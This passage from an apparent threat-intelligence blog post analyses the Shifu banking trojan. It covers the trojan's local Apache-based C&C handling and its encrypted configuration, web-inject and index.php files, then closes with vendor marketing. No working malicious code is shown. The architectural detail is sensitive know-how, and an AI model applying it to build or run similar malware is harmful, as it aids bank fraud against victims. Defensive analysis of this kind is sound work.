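    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

Because the function and line fields come straight from the bot's own source, the parsed output also gives a quick fingerprint of the build: a change in the line numbers reported for a given function means the operators have recompiled.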
The Shifu Trojan has targeted entities in the UK and Japan. As noted previously, the malware runs a local Apache httpd server, which is used to handle C&C communications, hold the retrieved configuration data and store the web injects. The configuration data lives in a "data" folder within the Apache install folder, and the web injects are stored in a file named "config.xml." Upon initial installation the files in the "data" folder are encrypted; after a successful connection to the C&C server they are populated with the downloaded configuration and web-inject data and stored unencrypted. The following snippet is taken from one of the configuration files targeting the UK (the targeted UK entities are those listed at the start of this post):
Also contained in the “data” folder is a config.php file. Based on publicly reported information, this file defines the following:
The final file within the “data” folder is the “index.php” file. This file is a set of instructions for the bot used to communicate with the C&C server. It also includes instructions on how to process the web injects. This file is populated upon installation of the httpd server but is encrypted until a valid C&C connection is established. After the C&C connection is successful, this data will be decrypted and stored along with the config and web injects files. The following are some of the functions found in this file:
Let Us Know if We Can Help…
We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you’d like to learn more about what we do in monitoring the cyber crime underground, download our on-demand webinar. If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.
Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!
The post Shifu Malware Analyzed: Behavior, Capabilities and Communications appeared first on iSIGHT Partners.